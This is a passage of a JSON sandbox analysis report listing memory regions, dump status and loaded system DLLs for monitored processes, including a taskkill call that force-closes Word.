"flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_335", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799758848, "type": "region", "version": 1 }, "end_va": 8791799824383, "entry_point": 0, "filename": null, "id": "region_1857", "name": "private_0x000007ff001a0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799758848, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { 
"filename": "process_00000010-region_00001858-addr_0x000007ff001b0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_336", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799824384, "type": "region", "version": 1 }, "end_va": 8791799889919, "entry_point": 0, "filename": null, "id": "region_1858", "name": "private_0x000007ff001b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799824384, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001859-addr_0x000007ff001c0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_337", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799889920, "type": "region", "version": 1 }, "end_va": 8791799955455, "entry_point": 0, "filename": null, "id": "region_1859", "name": "private_0x000007ff001c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799889920, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001860-addr_0x000007ff001d0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_338", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791799955456, "type": "region", "version": 1 }, "end_va": 8791800020991, "entry_point": 0, "filename": null, "id": "region_1860", "name": "private_0x000007ff001d0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791799955456, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { 
"dump": { "filename": "process_00000010-region_00001861-addr_0x000007ff001e0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_339", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800020992, "type": "region", "version": 1 }, "end_va": 8791800086527, "entry_point": 0, "filename": null, "id": "region_1861", "name": "private_0x000007ff001e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800020992, "timestamp": "00:01:18.765", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001894-addr_0x000007ff001f0000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_340", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800086528, "type": "region", "version": 1 }, "end_va": 8791800152063, "entry_point": 0, "filename": null, "id": "region_1894", "name": "private_0x000007ff001f0000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800086528, "timestamp": "00:01:20.654", "type": "region", "version": 1 }, { "dump": { "filename": "process_00000010-region_00001895-addr_0x000007ff00200000-size_0x0000000000010000-perm_.bin", "flags": [ "dumped" ], "info": "Region dumped", "permissions": [ "" ], "ref_process_dump": { "ref_id": "proc_dump_341", "ref_source": "summary", "ref_type": "process_dump", "type": "reference", "version": 1 }, "size": 65536, "start_va": 8791800152064, "type": "region", "version": 1 }, "end_va": 8791800217599, "entry_point": 0, "filename": null, "id": "region_1895", "name": "private_0x000007ff00200000", "norm_filename": null, "region_type": "private_memory", "start_va": 8791800152064, "timestamp": "00:01:20.654", "type": "region", 
"version": 1 } ], "terminate_reason": "terminated", "type": "monitored_process", "unmonitor_reason": "terminated_by_timeout", "version": 1 }, { "cmd_line": "\"C:\\Windows\\system32\\taskkill.exe\" /f /im winword.exe", "filename": "c:\\windows\\system32\\taskkill.exe", "id": "proc_11", "image_name": "taskkill.exe", "monitor_reason": "child_process", "monitored_id": 11, "origin_monitor_id": 9, "ref_parent_process": { "ref_id": "proc_9", "ref_source": "summary", "ref_type": "monitored_process", "type": "reference", "version": 1 }, "regions": [ { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 131072, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1966", "name": "private_0x0000000000010000", "norm_filename": null, "region_type": "private_memory", "start_va": 65536, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16384, "start_va": 196608, "type": "region", "version": 1 }, "end_va": 212991, "entry_point": 0, "filename": null, "id": "region_1967", "name": "pagefile_0x0000000000030000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 196608, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 4096, "start_va": 262144, "type": "region", "version": 1 }, "end_va": 266239, "entry_point": 0, "filename": null, "id": 
"region_1968", "name": "pagefile_0x0000000000040000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 262144, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 524288, "start_va": 1638400, "type": "region", "version": 1 }, "end_va": 2162687, "entry_point": 0, "filename": null, "id": "region_1969", "name": "private_0x0000000000190000", "norm_filename": null, "region_type": "private_memory", "start_va": 1638400, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1740800, "start_va": 2004877312, "type": "region", "version": 1 }, "end_va": 2006618111, "entry_point": 2004877312, "filename": "\\Windows\\System32\\ntdll.dll", "id": "region_1970", "name": "ntdll.dll", "norm_filename": "c:\\windows\\system32\\ntdll.dll", "region_type": "memory_mapped_file", "start_va": 2004877312, "timestamp": "00:01:23.495", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 16777216, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1971", "name": "private_0x000000007efe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2130575360, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the 
maximum number of dumps was reached", "permissions": [ "readable" ], "ref_process_dump": null, "size": 65536, "start_va": 2147352576, "type": "region", "version": 1 }, "end_va": 2147418111, "entry_point": 0, "filename": null, "id": "region_1972", "name": "private_0x000000007ffe0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2147352576, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 126976, "start_va": 4280942592, "type": "region", "version": 1 }, "end_va": 4281069567, "entry_point": 4280959632, "filename": "\\Windows\\System32\\taskkill.exe", "id": "region_1973", "name": "taskkill.exe", "norm_filename": "c:\\windows\\system32\\taskkill.exe", "region_type": "memory_mapped_file", "start_va": 4280942592, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 4096, "start_va": 8791792943104, "type": "region", "version": 1 }, "end_va": 8791792947199, "entry_point": 8791792943104, "filename": "\\Windows\\System32\\apisetschema.dll", "id": "region_1974", "name": "apisetschema.dll", "norm_filename": "c:\\windows\\system32\\apisetschema.dll", "region_type": "memory_mapped_file", "start_va": 8791792943104, "timestamp": "00:01:23.496", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 143360, "start_va": 8796092694528, "type": "region", "version": 1 }, "end_va": 8796092837887, "entry_point": 0, 
"filename": null, "id": "region_1975", "name": "pagefile_0x000007fffffb0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 8796092694528, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 8796092874752, "type": "region", "version": 1 }, "end_va": 8796092882943, "entry_point": 0, "filename": null, "id": "region_1976", "name": "private_0x000007fffffdc000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092874752, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 8796092882944, "type": "region", "version": 1 }, "end_va": 8796092887039, "entry_point": 0, "filename": null, "id": "region_1977", "name": "private_0x000007fffffde000", "norm_filename": null, "region_type": "private_memory", "start_va": 8796092882944, "timestamp": "00:01:23.499", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 65536, "type": "region", "version": 1 }, "end_va": 131071, "entry_point": 0, "filename": null, "id": "region_1978", "name": "pagefile_0x0000000000010000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 65536, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No 
dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 131072, "type": "region", "version": 1 }, "end_va": 196607, "entry_point": 0, "filename": null, "id": "region_1979", "name": "pagefile_0x0000000000020000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 131072, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 28672, "start_va": 327680, "type": "region", "version": 1 }, "end_va": 356351, "entry_point": 0, "filename": null, "id": "region_1980", "name": "pagefile_0x0000000000050000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 327680, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 393216, "type": "region", "version": 1 }, "end_va": 1441791, "entry_point": 0, "filename": null, "id": "region_1981", "name": "private_0x0000000000060000", "norm_filename": null, "region_type": "private_memory", "start_va": 393216, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 8192, "start_va": 1441792, "type": "region", "version": 1 }, "end_va": 1449983, "entry_point": 0, "filename": null, "id": "region_1982", "name": "pagefile_0x0000000000160000", 
"norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 1441792, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 16384, "start_va": 1507328, "type": "region", "version": 1 }, "end_va": 1523711, "entry_point": 1507328, "filename": "\\Windows\\System32\\en-US\\taskkill.exe.mui", "id": "region_1983", "name": "taskkill.exe.mui", "norm_filename": "c:\\windows\\system32\\en-us\\taskkill.exe.mui", "region_type": "memory_mapped_file", "start_va": 1507328, "timestamp": "00:01:23.540", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 1572864, "type": "region", "version": 1 }, "end_va": 1576959, "entry_point": 0, "filename": null, "id": "region_1984", "name": "private_0x0000000000180000", "norm_filename": null, "region_type": "private_memory", "start_va": 1572864, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable" ], "ref_process_dump": null, "size": 421888, "start_va": 2162688, "type": "region", "version": 1 }, "end_va": 2584575, "entry_point": 2162688, "filename": "\\Windows\\System32\\locale.nls", "id": "region_1985", "name": "locale.nls", "norm_filename": "c:\\windows\\system32\\locale.nls", "region_type": "memory_mapped_file", "start_va": 2162688, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ 
"readable", "writable" ], "ref_process_dump": null, "size": 4096, "start_va": 2621440, "type": "region", "version": 1 }, "end_va": 2625535, "entry_point": 0, "filename": null, "id": "region_1986", "name": "private_0x0000000000280000", "norm_filename": null, "region_type": "private_memory", "start_va": 2621440, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 65536, "start_va": 2818048, "type": "region", "version": 1 }, "end_va": 2883583, "entry_point": 0, "filename": null, "id": "region_1987", "name": "private_0x00000000002b0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2818048, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "max_num_dumps_reached" ], "info": "No dump was created because the maximum number of dumps was reached", "permissions": [ "readable", "writable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2883584, "type": "region", "version": 1 }, "end_va": 3932159, "entry_point": 0, "filename": null, "id": "region_1988", "name": "private_0x00000000002c0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2883584, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1605632, "start_va": 3932160, "type": "region", "version": 1 }, "end_va": 5537791, "entry_point": 0, "filename": null, "id": "region_1989", "name": "pagefile_0x00000000003c0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 3932160, "timestamp": "00:01:23.545", "type": "region", 
"version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1576960, "start_va": 5570560, "type": "region", "version": 1 }, "end_va": 7147519, "entry_point": 0, "filename": null, "id": "region_1990", "name": "pagefile_0x0000000000550000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 5570560, "timestamp": "00:01:23.545", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 20971520, "start_va": 7208960, "type": "region", "version": 1 }, "end_va": 28180479, "entry_point": 0, "filename": null, "id": "region_1991", "name": "pagefile_0x00000000006e0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 7208960, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1024000, "start_va": 2002649088, "type": "region", "version": 1 }, "end_va": 2003673087, "entry_point": 2002756296, "filename": "\\Windows\\System32\\user32.dll", "id": "region_1992", "name": "user32.dll", "norm_filename": "c:\\windows\\system32\\user32.dll", "region_type": "memory_mapped_file", "start_va": 2002649088, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1175552, "start_va": 2003697664, "type": "region", 
"version": 1 }, "end_va": 2004873215, "entry_point": 2003787424, "filename": "\\Windows\\System32\\kernel32.dll", "id": "region_1993", "name": "kernel32.dll", "norm_filename": "c:\\windows\\system32\\kernel32.dll", "region_type": "memory_mapped_file", "start_va": 2003697664, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "pagefile_backed_regions_ignored" ], "info": "No dump created because pagefile backed regions are disabled in the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 1048576, "start_va": 2130575360, "type": "region", "version": 1 }, "end_va": 2131623935, "entry_point": 0, "filename": null, "id": "region_1994", "name": "pagefile_0x000000007efe0000", "norm_filename": null, "region_type": "pagefile_backed_memory", "start_va": 2130575360, "timestamp": "00:01:23.546", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "region_too_big" ], "info": "No dump was created because region size surpasses maximum region dump size of the configuration", "permissions": [ "readable" ], "ref_process_dump": null, "size": 15728640, "start_va": 2131623936, "type": "region", "version": 1 }, "end_va": 2147352575, "entry_point": 0, "filename": null, "id": "region_1995", "name": "private_0x000000007f0e0000", "norm_filename": null, "region_type": "private_memory", "start_va": 2131623936, "timestamp": "00:01:23.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1200128, "start_va": 8791264264192, "type": "region", "version": 1 }, "end_va": 8791265464319, "entry_point": 8791264264192, "filename": "\\Windows\\System32\\dbghelp.dll", "id": "region_1996", "name": "dbghelp.dll", "norm_filename": "c:\\windows\\system32\\dbghelp.dll", "region_type": "memory_mapped_file", "start_va": 
8791264264192, "timestamp": "00:01:23.547", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 311296, "start_va": 8791560224768, "type": "region", "version": 1 }, "end_va": 8791560536063, "entry_point": 8791560224768, "filename": "\\Windows\\System32\\framedynos.dll", "id": "region_1997", "name": "framedynos.dll", "norm_filename": "c:\\windows\\system32\\framedynos.dll", "region_type": "memory_mapped_file", "start_va": 8791560224768, "timestamp": "00:01:23.555", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 98304, "start_va": 8791688151040, "type": "region", "version": 1 }, "end_va": 8791688249343, "entry_point": 8791688155152, "filename": "\\Windows\\System32\\mpr.dll", "id": "region_1998", "name": "mpr.dll", "norm_filename": "c:\\windows\\system32\\mpr.dll", "region_type": "memory_mapped_file", "start_va": 8791688151040, "timestamp": "00:01:23.585", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 86016, "start_va": 8791725703168, "type": "region", "version": 1 }, "end_va": 8791725789183, "entry_point": 8791725703168, "filename": "\\Windows\\System32\\wkscli.dll", "id": "region_1999", "name": "wkscli.dll", "norm_filename": "c:\\windows\\system32\\wkscli.dll", "region_type": "memory_mapped_file", "start_va": 8791725703168, "timestamp": "00:01:23.588", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is 
not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791725834240, "type": "region", "version": 1 }, "end_va": 8791725883391, "entry_point": 8791725834240, "filename": "\\Windows\\System32\\netutils.dll", "id": "region_2000", "name": "netutils.dll", "norm_filename": "c:\\windows\\system32\\netutils.dll", "region_type": "memory_mapped_file", "start_va": 8791725834240, "timestamp": "00:01:23.594", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 90112, "start_va": 8791725899776, "type": "region", "version": 1 }, "end_va": 8791725989887, "entry_point": 8791725899776, "filename": "\\Windows\\System32\\netapi32.dll", "id": "region_2001", "name": "netapi32.dll", "norm_filename": "c:\\windows\\system32\\netapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791725899776, "timestamp": "00:01:23.601", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 69632, "start_va": 8791729635328, "type": "region", "version": 1 }, "end_va": 8791729704959, "entry_point": 8791729639536, "filename": "\\Windows\\System32\\wtsapi32.dll", "id": "region_2002", "name": "wtsapi32.dll", "norm_filename": "c:\\windows\\system32\\wtsapi32.dll", "region_type": "memory_mapped_file", "start_va": 8791729635328, "timestamp": "00:01:23.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 49152, "start_va": 8791740448768, "type": "region", "version": 
1 }, "end_va": 8791740497919, "entry_point": 8791740452964, "filename": "\\Windows\\System32\\version.dll", "id": "region_2003", "name": "version.dll", "norm_filename": "c:\\windows\\system32\\version.dll", "region_type": "memory_mapped_file", "start_va": 8791740448768, "timestamp": "00:01:23.610", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 143360, "start_va": 8791753228288, "type": "region", "version": 1 }, "end_va": 8791753371647, "entry_point": 8791753232792, "filename": "\\Windows\\System32\\srvcli.dll", "id": "region_2004", "name": "srvcli.dll", "norm_filename": "c:\\windows\\system32\\srvcli.dll", "region_type": "memory_mapped_file", "start_va": 8791753228288, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 45056, "start_va": 8791753883648, "type": "region", "version": 1 }, "end_va": 8791753928703, "entry_point": 8791753887792, "filename": "\\Windows\\System32\\secur32.dll", "id": "region_2005", "name": "secur32.dll", "norm_filename": "c:\\windows\\system32\\secur32.dll", "region_type": "memory_mapped_file", "start_va": 8791753883648, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 151552, "start_va": 8791754080256, "type": "region", "version": 1 }, "end_va": 8791754231807, "entry_point": 8791754118744, "filename": "\\Windows\\System32\\sspicli.dll", "id": "region_2006", "name": "sspicli.dll", "norm_filename": 
"c:\\windows\\system32\\sspicli.dll", "region_type": "memory_mapped_file", "start_va": 8791754080256, "timestamp": "00:01:23.611", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 438272, "start_va": 8791758012416, "type": "region", "version": 1 }, "end_va": 8791758450687, "entry_point": 8791758024928, "filename": "\\Windows\\System32\\KernelBase.dll", "id": "region_2007", "name": "kernelbase.dll", "norm_filename": "c:\\windows\\system32\\kernelbase.dll", "region_type": "memory_mapped_file", "start_va": 8791758012416, "timestamp": "00:01:23.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 188416, "start_va": 8791759519744, "type": "region", "version": 1 }, "end_va": 8791759708159, "entry_point": 8791759523856, "filename": "\\Windows\\System32\\imm32.dll", "id": "region_2008", "name": "imm32.dll", "norm_filename": "c:\\windows\\system32\\imm32.dll", "region_type": "memory_mapped_file", "start_va": 8791759519744, "timestamp": "00:01:23.612", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 651264, "start_va": 8791761682432, "type": "region", "version": 1 }, "end_va": 8791762333695, "entry_point": 8791761692064, "filename": "\\Windows\\System32\\msvcrt.dll", "id": "region_2009", "name": "msvcrt.dll", "norm_filename": "c:\\windows\\system32\\msvcrt.dll", "region_type": "memory_mapped_file", "start_va": 8791761682432, "timestamp": "00:01:23.613", "type": "region", "version": 1 }, { "dump": 
{ "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 880640, "start_va": 8791762862080, "type": "region", "version": 1 }, "end_va": 8791763742719, "entry_point": 8791762874996, "filename": "\\Windows\\System32\\oleaut32.dll", "id": "region_2010", "name": "oleaut32.dll", "norm_filename": "c:\\windows\\system32\\oleaut32.dll", "region_type": "memory_mapped_file", "start_va": 8791762862080, "timestamp": "00:01:23.613", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 57344, "start_va": 8791763779584, "type": "region", "version": 1 }, "end_va": 8791763836927, "entry_point": 8791763783808, "filename": "\\Windows\\System32\\lpk.dll", "id": "region_2011", "name": "lpk.dll", "norm_filename": "c:\\windows\\system32\\lpk.dll", "region_type": "memory_mapped_file", "start_va": 8791763779584, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 2109440, "start_va": 8791766335488, "type": "region", "version": 1 }, "end_va": 8791768444927, "entry_point": 8791766479664, "filename": "\\Windows\\System32\\ole32.dll", "id": "region_2012", "name": "ole32.dll", "norm_filename": "c:\\windows\\system32\\ole32.dll", "region_type": "memory_mapped_file", "start_va": 8791766335488, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": 
null, "size": 315392, "start_va": 8791770726400, "type": "region", "version": 1 }, "end_va": 8791771041791, "entry_point": 8791770730608, "filename": "\\Windows\\System32\\ws2_32.dll", "id": "region_2013", "name": "ws2_32.dll", "norm_filename": "c:\\windows\\system32\\ws2_32.dll", "region_type": "memory_mapped_file", "start_va": 8791770726400, "timestamp": "00:01:23.614", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1232896, "start_va": 8791771054080, "type": "region", "version": 1 }, "end_va": 8791772286975, "entry_point": 8791771376976, "filename": "\\Windows\\System32\\rpcrt4.dll", "id": "region_2014", "name": "rpcrt4.dll", "norm_filename": "c:\\windows\\system32\\rpcrt4.dll", "region_type": "memory_mapped_file", "start_va": 8791771054080, "timestamp": "00:01:23.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 462848, "start_va": 8791772299264, "type": "region", "version": 1 }, "end_va": 8791772762111, "entry_point": 8791772372512, "filename": "\\Windows\\System32\\shlwapi.dll", "id": "region_2015", "name": "shlwapi.dll", "norm_filename": "c:\\windows\\system32\\shlwapi.dll", "region_type": "memory_mapped_file", "start_va": 8791772299264, "timestamp": "00:01:23.615", "type": "region", "version": 1 }, { "dump": { "filename": "", "flags": [ "unmonitored" ], "info": "No dump was created because region is not monitored", "permissions": [ "readable", "writable", "executable" ], "ref_process_dump": null, "size": 1085440, "start_va": 8791788683264, "type": "region", "version": 1 }, "end_va": 8791789768703, "entry_point": 8791788687460, "filename": 
